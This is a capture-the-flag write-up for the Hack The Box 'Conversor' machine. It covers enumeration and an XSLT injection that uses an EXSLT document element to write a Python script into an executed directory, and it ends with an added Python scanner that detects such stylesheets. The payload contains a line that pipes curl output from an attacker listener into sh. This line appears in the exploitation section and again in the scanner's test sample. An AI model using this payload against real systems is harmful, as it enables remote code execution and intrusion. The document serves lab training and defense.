HTB Conversor - Linux Easy Box Writeup

Summary

Conversor is an easy Linux box. The foothold is an XSLT injection in the web application's XML/XSLT converter: an EXSLT extension element is used to write a Python script into a directory the application executes, giving code execution as the web user. From there, database enumeration and hash cracking yield a user account, and a sudo misconfiguration gives root.

Skills Required:

  • Basic web application testing
  • XSLT injection knowledge
  • Database enumeration
  • Hash cracking
  • Sudo privilege escalation

Enumeration

Nmap Scan

nmap -sC -sV -oA conversor 10.10.x.x

Results:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 01:74:26:39:47:bc:6a:e2:cb:12:8b:71:84:9c:f8:5a (ECDSA)
|_  256 3a:16:90:dc:74:d8:e3:c4:51:36:e2:08:06:26:17:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.52
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://conversor.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)

Domain Setup

Apache redirects to http://conversor.htb/, so add the hostname to /etc/hosts (the file is root-owned, hence tee):

echo "10.10.x.x conversor.htb" | sudo tee -a /etc/hosts

Web Application Analysis

Navigating to http://conversor.htb reveals a web application called "Conversor" with user registration functionality.


After registering and logging in, we discover the main functionality - an XML and XSLT file converter:


Directory Discovery

Using gobuster to enumerate directories:

gobuster dir -u http://conversor.htb -w /usr/share/wordlists/dirb/common.txt

Key findings:

  • /static/ - Static files directory; anything placed here is served as-is by the web server
  • /scripts/ - Scripts directory; files written here are executed by the application rather than served, which is what makes it the target for the file write

Exploitation

XSLT Injection Analysis

The application accepts an XML document and an XSLT stylesheet and runs the transformation server-side. When the processor is invoked without access controls (libxslt, for instance, enables its extension modules by default), the stylesheet can use EXSLT extension elements, and exsl:document writes the body of a template to an arbitrary path on the server's filesystem. That turns a "convert my document" feature into an arbitrary file write, and an arbitrary file write into code execution wherever the application executes what it finds on disk.

Initial Payload Testing

The first attempt wrote a Python script into /static/, but files in that location are served as static content rather than executed, so the payload never ran.

Successful Code Execution

Writing the payload into /scripts/ instead gets it executed by the application.

Malicious XSLT payload (with method="text", the content of the exploit:document element is written verbatim to the href path; replace 10.10.x.x with your listener, which serves shell.sh on port 8000):

<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:exploit="http://exslt.org/common"
    extension-element-prefixes="exploit"
    version="1.0">
<xsl:template match="/">
<exploit:document href="/var/www/conversor.htb/scripts/shell.py" method="text">
import os
os.system("curl 10.10.x.x:8000/shell.sh|sh")
</exploit:document>
</xsl:template>
</xsl:stylesheet>
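The defensive counterpart to the payload above is worth seeing in code. The right fix is to run the transform with write access denied (in lxml that is `etree.XSLT(stylesheet, access_control=etree.XSLTAccessControl(write_file=False, create_dir=False, write_network=False))`), but a pre-transform scan of the uploaded stylesheet is a cheap second layer and makes the attack surface explicit. The following is an added example, not code from the Conversor application or the writeup; it uses only the standard library so it runs without lxml, and the namespace list is my assumption, drawn from the output extensions libxslt is known to honour (exsl:document, xt:document, saxon:output and the XSLT 1.1 draft xsl:document). The sample stylesheets embedded in it are constructed for the demonstration; the malicious one is the payload from this page.

```python
"""Pre-transform scan of an untrusted XSLT stylesheet for file-writing extension elements.

Added example; not part of the Conversor application. Standard library only.
"""
import xml.etree.ElementTree as ET

XSL_NS = "http://www.w3.org/1999/XSL/Transform"

# Extension elements that libxslt turns into a file write on the server.
# Assumption: this list covers the EXSLT, XT and SAXON variants and the
# XSLT 1.1 draft element; extend it for other processors.
WRITE_ELEMENTS = {
    (XSL_NS, "document"),                       # xsl:document (XSLT 1.1 draft)
    ("http://exslt.org/common", "document"),    # exsl:document (used in the payload above)
    ("http://www.jclark.com/xt", "document"),   # xt:document
    ("http://icl.com/saxon", "output"),         # saxon:output
}


def _split(tag):
    """Split an ElementTree '{ns}local' tag into (ns, local)."""
    if tag.startswith("{"):
        ns, local = tag[1:].split("}", 1)
        return ns, local
    return "", tag


def scan_stylesheet(xslt_text):
    """Return a list of findings; an empty list means no write primitive was seen.

    A stylesheet that is not well-formed is also reported, so the caller can
    reject it instead of handing it to the processor.
    """
    findings = []
    try:
        root = ET.fromstring(xslt_text)
    except ET.ParseError as exc:
        return [f"stylesheet is not well-formed XML: {exc}"]

    for el in root.iter():
        ns, local = _split(el.tag)
        if (ns, local) in WRITE_ELEMENTS:
            href = el.get("href", "")
            findings.append(f"{local} element in namespace {ns!r} writing to {href!r}")

    # Declaring extension-element-prefixes asks the processor to execute
    # extension elements at all; flag it even when no known element matched,
    # since a prefix bound to an unlisted extension namespace would slip past
    # the table above.
    prefixes = root.get("extension-element-prefixes")
    if prefixes:
        findings.append(f"stylesheet enables extension elements: {prefixes!r}")
    return findings


# Constructed sample: a harmless stylesheet that only emits text.
BENIGN_XSLT = """<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:output method="text"/>
  <xsl:template match="/"><xsl:value-of select="/root/title"/></xsl:template>
</xsl:stylesheet>"""

# The payload from this writeup, with the listener address left as a placeholder.
MALICIOUS_XSLT = """<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:exploit="http://exslt.org/common"
    extension-element-prefixes="exploit"
    version="1.0">
<xsl:template match="/">
<exploit:document href="/var/www/conversor.htb/scripts/shell.py" method="text">
import os
os.system("curl 10.10.x.x:8000/shell.sh|sh")
</exploit:document>
</xsl:template>
</xsl:stylesheet>"""


if __name__ == "__main__":
    for name, sheet in (("benign", BENIGN_XSLT), ("malicious", MALICIOUS_XSLT)):
        print(name, "->", scan_stylesheet(sheet) or "clean")
```

The scan is a gatekeeper, not a parser-level guarantee: it catches the known write elements and the declaration that enables extension elements, but the processor's own access control is what actually prevents the write, so use both.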